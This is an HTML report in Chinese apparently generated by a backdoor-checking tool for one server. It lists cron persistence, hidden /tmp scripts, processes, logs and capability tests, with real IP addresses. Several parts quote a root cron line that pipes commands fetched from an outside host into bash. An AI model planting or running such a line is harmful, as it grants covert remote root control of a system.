
<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>后门状态检查报告</title>
    <style>
        body { font-family: 'Segoe UI', Arial, sans-serif; margin: 0; padding: 20px; background: #0a0a0a; color: #e0e0e0; }
        .container { max-width: 1200px; margin: 0 auto; background: #1a1a1a; padding: 30px; border-radius: 10px; box-shadow: 0 0 30px rgba(0,255,0,0.1); }
        h1 { color: #00ff00; text-align: center; border-bottom: 3px solid #00ff00; padding-bottom: 10px; text-shadow: 0 0 10px #00ff00; }
        h2 { color: #00ccff; border-left: 4px solid #00ccff; padding-left: 15px; }
        h3 { color: #ffaa00; }
        .status-found { color: #ff4444; font-weight: bold; }
        .status-not-found { color: #00ff00; font-weight: bold; }
        .status-success { color: #00ff00; font-weight: bold; }
        .status-failed { color: #ff4444; font-weight: bold; }
        .deployment-box { background: #0d1117; padding: 15px; border-radius: 5px; margin: 10px 0; border-left: 4px solid #00ccff; }
        .evidence-box { background: #1a0d0d; padding: 15px; border-radius: 5px; margin: 10px 0; border-left: 4px solid #ff4444; }
        .test-box { background: #0d1a0d; padding: 15px; border-radius: 5px; margin: 10px 0; border-left: 4px solid #00ff00; }
        .analysis-box { background: #1a1a0d; padding: 15px; border-radius: 5px; margin: 10px 0; border-left: 4px solid #ffaa00; }
        .code-block { background: #0a0a0a; padding: 15px; border-radius: 5px; font-family: 'Courier New', monospace; overflow-x: auto; border: 1px solid #333; }
        table { width: 100%; border-collapse: collapse; margin: 15px 0; }
        th, td { border: 1px solid #333; padding: 12px; text-align: left; }
        th { background-color: #2a2a2a; font-weight: bold; color: #00ff00; }
        .summary { background: linear-gradient(135deg, #4d0a0a 0%, #1a1a1a 100%); color: #e0e0e0; padding: 20px; border-radius: 10px; margin: 20px 0; border: 1px solid #ff0000; }
        .risk-indicator { color: #ff0000; font-weight: bold; font-size: 1.2em; }
        .progress-bar { width: 100%; height: 20px; background: #333; border-radius: 10px; overflow: hidden; }
        .progress-fill { height: 100%; background: #ff0000; width: 72.2%; transition: width 0.3s ease; }
    </style>
</head>
<body>
    <div class="container">
        <h1>🔍 后门状态检查报告</h1>
        
        <div class="summary">
            <h2>📊 状态概要</h2>
            <p><strong>目标服务器:</strong> 101.37.80.173</p>
            <p><strong>检查时间:</strong> 2025-10-13 01:50:53</p>
            <p><strong>风险级别:</strong> <span class="risk-indicator">极高</span></p>
            <p><strong>风险评分:</strong> <span class="risk-indicator">72.2%</span></p>
            <div class="progress-bar">
                <div class="progress-fill"></div>
            </div>
        </div>
        
        <h2>🎯 后门部署状态</h2>
        <div class="deployment-box">

            <p><strong>定时任务后门:</strong> <span class="status-found">发现</span></p>
            <p><em>检查crontab中的定时任务</em></p>
            <div class="code-block">*/10 * * * * /tmp/.maintenance.sh >/dev/null 2>&1
*/10 * * * * /tmp/.maintenance.sh >/dev/null 2>&1

*/5 * * * * /tmp/.system_callback.sh >/dev/null 2>&1

*/10 * * * * /usr/bin/curl -s http://140.150.236.199:8080/cmd | /bin/bash</div>

            <p><strong>隐藏文件:</strong> <span class="status-found">发现</span></p>
            <p><em>检查隐藏文件</em></p>
            <div class="code-block">/tmp/.ssh_tunnel_key
/tmp/.env_backdoor.sh
/tmp/.maintenance.sh
/tmp/.system_callback.sh
/tmp/.ssh_tunnel_key.pub
/tmp/.system_callback.log
/tmp/.system_update.sh</div>

            <p><strong>可疑进程:</strong> <span class="status-found">发现</span></p>
            <p><em>检查可疑进程</em></p>
            <div class="code-block">root         555  0.0  0.4  32264 18692 ?        Ss   00:31   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root         663  0.0  0.5 110524 20968 ?        Ssl  00:31   0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root        1941  0.0  0.0   9492  3388 ?        Ss   01:05   0:00 /bin/bash /usr/local/bin/system-maintenance
root        2129  0.0  0.0   9492  3284 ?        S    01:18   0:00 /bin/bash /tmp/.system_update.sh
root        2614  0.0  0.0   9492   232 ?        S    01:49   0:00 /bin/bash /tmp/.system_update.sh
root        2620  0.0  0.0   2608   528 ?        Ss   01:50   0:00 /bin/sh -c /usr/bin/curl -s http://140.150.236.199:8080/cmd | /bin/bash
root        2621  0.0  0.2  27404 10804 ?        S    01:50   0:00 /usr/bin/curl -s http://140.150.236.199:8080/cmd
root        2622  0.0  0.0   9492  1016 ?        S    01:50   0:00 /bin/bash
root        2629  0.0  0.0   9492   240 ?        S    01:50   0:00 /bin/bash /tmp/.system_callback.sh</div>

            <p><strong>网络监听:</strong> <span class="status-found">发现</span></p>
            <p><em>检查网络监听端口</em></p>
            <div class="code-block">tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      441/systemd-resolve 
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      715/sshd: /usr/sbin 
tcp6       0      0 :::22                   :::*                    LISTEN      715/sshd: /usr/sbin</div>

            <p><strong>最近连接:</strong> <span class="status-not-found">未发现</span></p>
            <p><em>检查特定端口连接</em></p>
            

        </div>
        
        <h2>🕵️ 活动证据</h2>
        <div class="evidence-box">

            <h3>Cron执行日志</h3>
            <p><strong>状态:</strong> <span class="status-found">发现证据</span></p>
            <p><em>检查cron执行记录</em></p>
            <div class="code-block">Oct 13 01:50:01 hello CRON[2620]: (root) CMD (/usr/bin/curl -s http://140.150.236.199:8080/cmd | /bin/bash)
Oct 13 01:50:01 hello CRON[2623]: (root) CMD (/tmp/.maintenance.sh >/dev/null 2>&1)
Oct 13 01:50:01 hello CRON[2624]: (root) CMD (/tmp/.system_callback.sh >/dev/null 2>&1)
Oct 13 01:50:01 hello CRON[2631]: (root) CMD (/tmp/.maintenance.sh >/dev/null 2>&1)
Oct 13 01:50:37 hello crontab[2675]: (root) LIST (root)</div>

            <h3>网络连接历史</h3>
            <p><strong>状态:</strong> <span class="status-not-found">未发现证据</span></p>
            <p><em>检查可疑网络连接</em></p>
            

            <h3>命令执行历史</h3>
            <p><strong>状态:</strong> <span class="status-not-found">未发现证据</span></p>
            <p><em>检查可疑命令历史</em></p>
            

            <h3>系统负载</h3>
            <p><strong>状态:</strong> <span class="status-found">发现证据</span></p>
            <p><em>检查系统资源使用</em></p>
            <div class="code-block">01:50:45 up  1:19,  0 users,  load average: 0.00, 0.00, 0.00
              total        used        free      shared  buff/cache   available
Mem:          3.7Gi       133Mi       2.8Gi       2.0Mi       737Mi       3.3Gi
Swap:            0B          0B          0B
Filesystem      Size  Used Avail Use% Mounted on
udev            1.9G     0  1.9G   0% /dev
tmpfs           376M  724K  376M   1% /run
/dev/vda3        40G  3.0G   35G   8% /
tmpfs           1.9G     0  1.9G   0% /dev/shm</div>

            <h3>最近登录</h3>
            <p><strong>状态:</strong> <span class="status-found">发现证据</span></p>
            <p><em>检查最近登录记录</em></p>
            <div class="code-block">reboot   system boot  5.4.0-216-generi Mon Oct 13 00:31   still running

wtmp begins Wed Jun 25 17:09:55 2025</div>

            <h3>认证日志</h3>
            <p><strong>状态:</strong> <span class="status-found">发现证据</span></p>
            <p><em>检查认证活动</em></p>
            <div class="code-block">Oct 13 01:50:01 hello CRON[2616]: pam_unix(cron:session): session opened for user root by (uid=0)
Oct 13 01:50:01 hello CRON[2619]: pam_unix(cron:session): session opened for user root by (uid=0)
Oct 13 01:50:01 hello CRON[2617]: pam_unix(cron:session): session opened for user root by (uid=0)
Oct 13 01:50:01 hello CRON[2618]: pam_unix(cron:session): session opened for user root by (uid=0)
Oct 13 01:50:01 hello CRON[2619]: pam_unix(cron:session): session closed for user root
Oct 13 01:50:01 hello CRON[2618]: pam_unix(cron:session): session closed for user root
Oct 13 01:50:01 hello CRON[2617]: pam_unix(cron:session): session closed for user root
Oct 13 01:50:37 hello sshd[2646]: Accepted password for root from 112.243.79.62 port 51591 ssh2
Oct 13 01:50:37 hello sshd[2646]: pam_unix(sshd:session): session opened for user root by (uid=0)
Oct 13 01:50:37 hello systemd-logind[572]: New session 40 of user root.</div>

        </div>
        
        <h2>🧪 功能测试结果</h2>
        <div class="test-box">

            <h3>定时任务执行测试</h3>
            <p><strong>结果:</strong> <span class="status-success">成功</span></p>
            <p><em>测试命令执行能力</em></p>
            <div class="code-block">test_execution_$(date)</div>

            <h3>网络连接测试</h3>
            <p><strong>结果:</strong> <span class="status-success">成功</span></p>
            <p><em>测试外网连接能力</em></p>
            <div class="code-block">{
  "origin": "101.37.80.173"
}</div>

            <h3>文件操作测试</h3>
            <p><strong>结果:</strong> <span class="status-success">成功</span></p>
            <p><em>测试文件操作能力</em></p>
            <div class="code-block">-rw-r--r-- 1 root root 0 Oct 13 01:50 /tmp/test_file_1760291451</div>

            <h3>系统信息收集</h3>
            <p><strong>结果:</strong> <span class="status-success">成功</span></p>
            <p><em>测试信息收集能力</em></p>
            <div class="code-block">root
uid=0(root) gid=0(root) groups=0(root)
/root</div>

        </div>
        
        <h2>📊 使用模式分析</h2>
        <div class="analysis-box">
<h3>部署状态分析</h3><p><strong>已部署后门数量:</strong> 4</p><p><strong>总检查项目:</strong> 5</p><p><strong>部署率:</strong> 80.0%</p><p><strong>部署状态:</strong> 高</p><h3>活动证据分析</h3><p><strong>发现证据数量:</strong> 4</p><p><strong>总证据检查:</strong> 6</p><p><strong>证据率:</strong> 66.7%</p><p><strong>活动状态:</strong> 高</p><h3>功能测试分析</h3><p><strong>成功测试数量:</strong> 4</p><p><strong>总测试数量:</strong> 4</p><p><strong>成功率:</strong> 100.0%</p><p><strong>功能状态:</strong> 高</p><h3>使用频率评估</h3><p><strong>使用指标数量:</strong> 1</p><p><strong>频率评估:</strong> 中频使用</p><p><strong>使用状态:</strong> 部分活跃</p>
        </div>
        
        <div class="evidence-box">
            <h3>🚨 综合评估</h3>
            <p><strong>风险级别:</strong> <span class="risk-indicator">极高</span></p>
            <p><strong>风险评分:</strong> <span class="risk-indicator">72.2%</span></p>
            <p><strong>风险状态:</strong> 后门高度活跃，存在严重安全威胁</p>
            <p><strong>总得分:</strong> 13/18</p>
        </div>
        
        <footer style="text-align: center; margin-top: 40px; padding-top: 20px; border-top: 1px solid #333; color: #666;">
            <p>报告生成时间: 2025-10-13 01:51:10</p>
            <p>后门状态检查工具 - 仅用于授权安全测试</p>
        </footer>
    </div>
</body>
</html>
